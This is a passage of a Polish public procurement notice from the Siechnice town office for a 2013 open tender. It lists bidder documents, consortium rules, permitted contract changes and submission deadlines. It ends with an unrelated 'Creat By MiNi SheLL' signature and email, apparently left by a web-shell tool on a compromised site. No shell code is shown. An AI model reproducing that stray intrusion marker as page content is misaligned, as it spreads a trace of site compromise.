<p>1) podpisany druk oświadczenia o zaakceptowaniu warunków przetargu - druk w załączeniu (Załącznik nr 5
do specyfikacji istotnych warunków zamówienia - Oświadczenie o zaakceptowaniu warunków udziału w
postępowaniu) W przypadku składania oferty przez wykonawców ubiegających się wspólnie o udzielenie
zamówienia, wymagane oświadczenie musi być złożone przez każdego wykonawcę w zakresie w jakim
jego dotyczy. 2) Wykonawca, ubiegający się o niniejsze zamówienie, który polega na wiedzy i
doświadczeniu, potencjale technicznym lub zdolności ekonomicznej i finansowej innych podmiotów,
niezależnie od charakteru prawnego łączących go z nim stosunków, zgodnie z art. 26 ust. 2b PZP,
zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji
zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do
oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu
zamówienia oraz żąda złożenia dokumentów dotyczących: a) zakresu dostępnych wykonawcy zasobów
innego podmiotu, b) sposobu wykorzystania zasobów innego podmiotu przez wykonawcę przy realizacji
zamówienia, c) charakteru stosunku, jaki będzie łączył wykonawcę z innym podmiotem, d) zakresu i okresu
udziału innego podmiotu przy wykonywaniu zamówienia. 3) jeżeli Wykonawca, wykazując spełnienie
warunków, o których mowa w art. 22 ust.1 ustawy Pzp, polega na zasobach innych podmiotów na
zasadach określonych w art. 26 ust. 2b Pzp, a podmioty te będą brały udział w realizacji zamówienia,
Zamawiający żąda od Wykonawcy przedstawienia w odniesieniu do tych podmiotów dokumentów
wymienionych w pkt 6.2 - 6.4 specyfikacji istotnych warunków zamówienia 4) listę podmiotów należących
do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5, albo informację o tym, że Wykonawca
nie należy do grupy kapitałowej, których wzór stanowią odpowiednio załączniki nr 11 i nr 12 do specyfikacji
istotnych warunków zamówienia. 5) w przypadku oferty składanej przez Wykonawców wspólnie
ubiegających się o udzielenie zamówienia: a) oświadczenia wymienione w pkt. 6.1 i 6.2 specyfikacji
istotnych warunków zamówienia składane są przez wszystkich Wykonawców wspólnie ubiegających się o
udzielenie zamówienia. b) dokumenty wymienione w pkt 6.3 specyfikacji istotnych warunków zamówienia
składa każdy z Wykonawców. W przypadku prowadzenia działalności w formie spółki cywilnej i
przedłożenia do oferty zaświadczenia o wpisie do ewidencji działalności gospodarczej należy do tego
dokumentu dołączyć umowę spółki. Warunek nie ma zastosowania w przypadku załączenia do oferty
aktualnego odpisu z właściwego rejestru, jeżeli ujawniono w nim wspólników spółki, jak i sposób
reprezentowania spółki (składania oświadczeń woli). c) dokumenty wymienione w pkt 6.3, 6.4, 6.5, 6.6 i 6.7
specyfikacji istotnych warunków zamówienia muszą potwierdzać spełnienie warunków szczegółowych
łącznie przez Wykonawców składających wspólnie ofertę. 6) pełnomocnictwo dla podmiotów
występujących wspólnie (konsorcjum, spółka cywilna), jeżeli zaistnieje taka sytuacja, zgodnie z art. 23
ustawy Prawo zamówień publicznych. W razie wyboru oferty podmiotów występujących wspólnie,
Zamawiający zażąda przed zawarciem umowy - stosownie do art. 23 ust. 4 - umowy regulującej współpracę tych podmiotów. Oferta konsorcjum musi spełniać następujące wymagania - zawierać odrębne
i niezależne dla każdego uczestnika konsorcjum wszystkie dokumenty i oświadczenia wymienione
powyżej, podpisana w taki sposób, by zobowiązywała prawnie wszystkie strony - to znaczy podpisana
przez przedstawiciela konsorcjum, którego upoważnienie do złożenia oferty wynika z dołączonego
pełnomocnictwa, udzielonego przez upoważnionych przedstawicieli członków konsorcjum 7)
pełnomocnictwo dla osoby podpisującej ofertę i inne dokumenty w imieniu wykonawcy, jeżeli jest to osoba
nie wykazana w rejestrze 8) Zaakceptowane istotne postanowienia umowy - druki w załączeniu (Załącznik
nr 6 do specyfikacji istotnych warunków zamówienia - Istotne warunki umowy) 9) podpisany druk
oświadczenia o zaakceptowaniu warunków przetargu - druk w załączeniu (Załącznik nr 11 do specyfikacji
istotnych warunków zamówienia - Oświadczenie dotyczące elementów rozliczeniowych) W przypadku
składania oferty przez wykonawców ubiegających się wspólnie o udzielenie zamówienia, wymagane
oświadczenie musi być złożone przez każdego wykonawcę w zakresie w jakim jego dotyczy. 10) kosztorys
ofertowy (wykaz cen jednostkowych) - opracowany na podstawie wzorów stanowiących odpowiednio dla
poszczególnych zadań będących przedmiotem zamówienia, załącznik nr 10 do specyfikacji istotnych
warunków zamówienia. 11) Wypełnionego druku oferty - zgodnie ze wzorem stanowiącym załącznik nr 1
do SIWZ - wzór oferty Cena zawarta w ofercie musi uwzględniać wszystkie prace wynikające z
dokumentacji i z wizji w terenie.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza nieistotne zmiany w umowie oraz inne zmiany postanowień zawartych w istotnych
postanowieniach umowy, które Zamawiający przewidział w ogłoszeniu, specyfikacji istotnych warunków
zamówienia lub istotnych warunkach umowy, stanowiących załącznik nr 6 do specyfikacji istotnych
warunków umowy. 1. Zamawiający dopuszcza możliwość przerwania świadczenia prac nie z winy
Wykonawcy, których nie można było przewidzieć lub którym skutkom nie można było zapobiec, pomimo
dołożenia przez Wykonawcę najwyższej staranności (np.: klęska żywiołowa i inne). Zamawiający
dopuszcza zmianę terminu realizacji umowy w przypadku wystąpienia okoliczności niezależnych od
Wykonawcy skutkujących niemożliwością dotrzymania terminu określonego w Umowie, termin ten może
ulec przedłużeniu, nie dłużej jednak niż o czas trwania tych okoliczności. 2. Zamawiający dopuszcza zmianę przedstawicieli stron umowy. Zamawiający dopuszcza zmianę kierownika budowy,
przedstawionego w ofercie, jedynie za uprzednią pisemną zgodą Zamawiającego, akceptując nowego
kierownika robót, w przypadku, gdy Wykonawca z własnej inicjatywy proponuje zmianę kierownika robót w
następujących przypadkach: 1) śmierci, choroby lub innych zdarzeń losowych dotyczących kierownika
robót, 2) nie wywiązywania się kierownika robót z obowiązków wynikających z umowy, 3) jeżeli zmiana
kierownika robót stanie się konieczna z jakichkolwiek przyczyn niezależnych od Wykonawcy (np.
rezygnacji). 3. Zamawiający może zażądać od wykonawcy zmiany kierownika robót, jeżeli uzna, że nie
wykonuje on swoich obowiązków wynikających z umowy. Wykonawca zobowiązany jest zmienić kierownika
robót zgodnie z żądaniem Zamawiającego we wskazanym przez Zamawiającego terminie. 4. W przypadku
zmiany kierownika budowy nowy kierownika robót musi spełniać wymagania określone w SIWZ dla danego
specjalisty. 5. Zamawiający dopuszcza możliwość zmiany sposobu rozliczania umowy lub dokonywania
płatności. 6. Zamawiający dopuszcza możliwość zmiany stawki podatku VAT w przypadku zmiany
przepisów dotyczących podatku VAT. 7. Zamawiający zastrzega sobie prawo zmniejszenia lub zwiększenia
zakresu zadania. Zmiany będą dotyczyły tylko zakresu, który wyniknie w trakcie realizacji zadania a będzie
niezbędny do właściwego zakończenia podstawowego zamówienia. 8. Zamawiający dopuszcza możliwość
zmiany podwykonawców: w przypadku wprowadzenia podwykonawcy, wprowadzenia nowego (kolejnego)
podwykonawcy, rezygnacji podwykonawcy, zmiany wartości lub zakresu robót wykonywanych przez
podwykonawcę, Zamawiający może wyrazić zgodę na powyższe po zaakceptowaniu umowy Wykonawcy z
podwykonawcą wraz z częścią dokumentacji dot. wykonania robót określonych w umowie, w terminie 14
dni od przekazania umowy przez Wykonawcę. 9. Zamawiający dopuszcza możliwość zmiany koordynatora
na pisemną prośbę Wykonawcy lub Zamawiającego. Po otrzymaniu pisemnej prośby dot. zmiany
koordynatora określonego w umowie, w terminie 14 dni od przekazania, Zamawiający może wyrazić zgodę
na powyższe.. 10. Zmiany na skutek wydanych decyzji, uzgodnień, faktycznych uwarunkowań terenowych i
gruntowych, powodujących konieczność modyfikacji rozwiązań. 11. Innych sytuacji, których nie można było
przewidzieć w chwili zawarcia umowy i mających charakter zmian nieistotnych tj. nie odnoszących się do
kwestii, które podlegały ocenie podczas wyboru Wykonawcy i takich, które gdyby były znane w momencie
wszczęcia procedury mającej na celu wybór Wykonawcy, nie miałyby wpływu na udział większej ilości
podmiotów zainteresowanych tą procedurą. 12. Zamawiający dopuszcza zmianę terminu realizacji umowy
lub poszczególnych jej części (zleceń) o czas trwania poniższych okoliczności, w przypadku: 1)
wystąpienia okoliczności niezależnych od Wykonawcy skutkujących niemożliwością dotrzymania terminu
określonego w Umowie, termin ten może ulec przedłużeniu, nie dłużej jednak niż o czas trwania tych
okoliczności, 2) konieczności wprowadzenia zmian w dokumentacji projektowej, a wynikających z
konieczności dostosowania zakresu zadania do wytycznych programowych, powszechnie obowiązujących
przepisów prawa, wprowadzenia zmian w rozwiązaniach technicznych lub usunięcia wad w dostarczonej
dokumentacji projektowej, 3) nie przekazania przez Zamawiającego terenu budowy w terminie określonym
w umowie, 4) opóźnień Zamawiającego w przekazaniu Wykonawcy dokumentów budowy (pozwolenia na budowę, dokumentacji projektowej, specyfikacji technicznych, innych wymaganych przepisami, do których
przekazania Zamawiający był zobowiązany), 5) przerwy w robotach spowodowanej wystąpieniem znalezisk
archeologicznych lub innych znalezisk czy wykopalisk, uniemożliwiających wykonywanie robót, 6)
wstrzymania przez Zamawiającego wykonywanie robót, 7) działania siły wyższej w rozumieniu przepisów
Kodeksu cywilnego lub 8) opóźnień związanych z uzyskiwaniem przez Wykonawcę niezbędnych w myśl
ustawy Prawo budowlane dokumentów lub 9) innych okoliczności nie powstałych z winy Wykonawcy lub
10) wystąpienia robót dodatkowych, nie objętych zamówieniem podstawowym, niezbędnych do jego
prawidłowego wykonania, których wykonanie stało się konieczne na skutek sytuacji niemożliwej wcześniej
do przewidzenia, jeżeli: a) z przyczyn technicznych lub gospodarczych oddzielenie zamówienia
dodatkowego od zamówienia podstawowego wymagałoby poniesienia niewspółmiernie wysokich kosztów,
lub b) wykonanie zamówienia podstawowego jest uzależnione od wykonania zamówienia dodatkowego, a
wykonanie zamówienia dodatkowego uniemożliwia wykonanie zamówienia podstawowego a wykonanie
zamówienia dodatkowego uniemożliwia wykonanie zamówienia podstawowego w terminie umownym.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.siechnice.dolnyslask.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Siechnicach, ul. Jana Pawła II 12, 55-011 Siechnice.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.05.2013 godzina 11:30, miejsce: Urząd Miejski w Siechnicach, ul. Jana Pawła II 12, 55-011 Siechnice, kancelaria -
parter budynku.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com